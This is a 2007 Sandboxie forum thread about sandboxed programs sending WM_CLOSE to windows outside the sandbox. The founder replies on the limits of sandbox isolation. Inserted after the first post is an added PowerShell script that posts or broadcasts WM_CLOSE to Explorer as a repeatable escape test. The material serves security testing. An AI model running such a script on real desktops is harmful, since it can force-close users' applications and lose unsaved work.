Vulnerability

If it doesn't fit elsewhere, it goes here
street011
Posts: 412
Joined: Tue Jan 16, 2007 2:08 pm

Post by street011 » Mon Jan 22, 2007 4:31 am

I ran Spy in Sandboxie,
I just selected the 'explorer' window with the crosshair,
went to the Misc tab,
selected HWND_BROADCAST / WM_CLOSE / HEX ==> SEND

Then everything kind of shuts down :p

Luckily Windows asked me HOW I wanted to shut down :p
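The same test as a script, so it can be repeated without a window-spy tool. This is an added example, not code from the thread or from Sandboxie; it assumes a Windows host with PowerShell (Add-Type P/Invoke) and is meant to be run from inside the sandbox, since the point of the test is whether a sandboxed process can deliver WM_CLOSE to windows that are not sandboxed. The function name Send-WmClose and the default target class "Progman" (Explorer's desktop window) are choices made for this example.

```powershell
# Added example (not from the original thread): reproduce street011's
# HWND_BROADCAST / WM_CLOSE test from PowerShell instead of a spy tool.
Add-Type -Namespace Win32 -Name Msg -MemberDefinition @'
[DllImport("user32.dll", SetLastError = true)]
public static extern bool PostMessage(IntPtr hWnd, uint Msg, IntPtr wParam, IntPtr lParam);

[DllImport("user32.dll", SetLastError = true)]
public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);
'@

$WM_CLOSE       = 0x0010          # standard user32 message number
$HWND_BROADCAST = [IntPtr]0xFFFF  # every top-level window on the desktop

function Send-WmClose {
    param(
        # Window class to target when not broadcasting. "Progman" is the
        # Explorer desktop window; assumption made for this example.
        [string]$ClassName = "Progman",
        # Reproduce the broadcast variant from the post. On an unsandboxed
        # desktop this asks every top-level window to close, so use with care.
        [switch]$Broadcast
    )

    if ($Broadcast) {
        $target = $HWND_BROADCAST
    } else {
        $target = [Win32.Msg]::FindWindow($ClassName, $null)
        if ($target -eq [IntPtr]::Zero) {
            throw "No top-level window of class '$ClassName' found"
        }
    }

    # PostMessage rather than SendMessage: a broadcast SendMessage blocks
    # until every window has handled the message, and one hung window
    # hangs the sender. For this test the delivery is what matters.
    $ok = [Win32.Msg]::PostMessage($target, $WM_CLOSE, [IntPtr]::Zero, [IntPtr]::Zero)
    return $ok
}

# Targeted check: only Explorer's desktop window.
Send-WmClose

# Broadcast check, exactly what the post did:
# Send-WmClose -Broadcast
```

If the script is started inside the sandbox and the unsandboxed Explorer reacts, window messages are crossing the sandbox boundary, which is the hole the rest of the thread discusses. A sandbox that isolates window messages (for example by placing sandboxed processes on a separate desktop or window station) would make FindWindow fail to see Progman at all.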

tzuk
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Mon Jan 22, 2007 7:05 pm

Okay. To sum this up, you're right: the principle of the matter is that there may be holes in Sandboxie at this time, and if malware knows about these holes, it can abuse them at this time.

My objection was only to the unequivocal claim that there will always be holes that can be taken advantage of. I was trying to say that holes can be closed, and in the long term, I believe Sandboxie can be made bullet-proof.

As for this particular hole: While it would be preferable that a sandboxed program not be able to shut down your Explorer, this hole does not put your system at risk of sustaining permanent damage that comes from within the sandbox.

And even this will be improved in future versions.
tzuk

OwenBurnett
Posts: 112
Joined: Mon Dec 18, 2006 11:36 am

Post by OwenBurnett » Wed Jan 24, 2007 1:39 pm

@street011
Cool, that's the CLOSE thing. How do you do the code injection thing?
It also works with the 2.76 beta.

@tzuk
Can we expect this to be fixed in the next beta release?

Owen

Unknown_User_596
Posts: 0
Joined: Wed Dec 31, 1969 7:00 pm

Post by Unknown_User_596 » Wed Jan 24, 2007 2:15 pm

tzuk wrote: I'm just surprised at some people jumping to conclusions. For instance:
... there are a lot of other ways to get to the system level! Without going into details to much ...
Oh, I wish you would go into that detail. Otherwise you're just saying "there are other attack vectors ... I think! ... But anyway I'm not telling" which is just . . . puzzling.
After investing a few hours today I have to say it is not easy to get an attack vector for Sandboxie. (In fact I did not find any up-and-running break-out possibility by now.) My first thought in the last quote was not to educate anyone about possible weaknesses of Sandboxie, so I did not want to include possible methods for attacks. But after my tests today I assume all the more simple approaches will not work because Sandboxie has some history … => as I understand it, an open discussion on attacks will help more.

One “possible”

tzuk
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Sat Jan 27, 2007 6:35 pm

Unknown_User_596 wrote: One “possible”
tzuk

tzuk
Sandboxie Founder
Posts: 16076
Joined: Tue Jun 22, 2004 12:57 pm

Post by tzuk » Mon Jan 29, 2007 4:44 pm

I want to add another reservation here.

It's possible for a system to contain kernel-mode code with unknown vulnerabilities. For example, third-party hardware drivers may not handle some data properly, and this could allow their abuse in a way that lets an application gain access to kernel mode.

For example: This link (PDF) describes abusing a firewall to gain kernel-mode access. (The particular firewall was fixed, but the principle remains.)

The abusive application could even be sandboxed, but if it can abuse a system component to gain kernel-mode access, then the application can easily bypass Sandboxie and any other system protection tool.

My earlier statement:
I wrote:. . . holes can be closed, and in the long term, I believe Sandboxie can be made bullet-proof.
While technically correct, Sandboxie is just one of a large number of kernel-mode components, and, in principle (but not necessarily in practice), each one of these components may be abused by an application to gain full access to the system.
tzuk
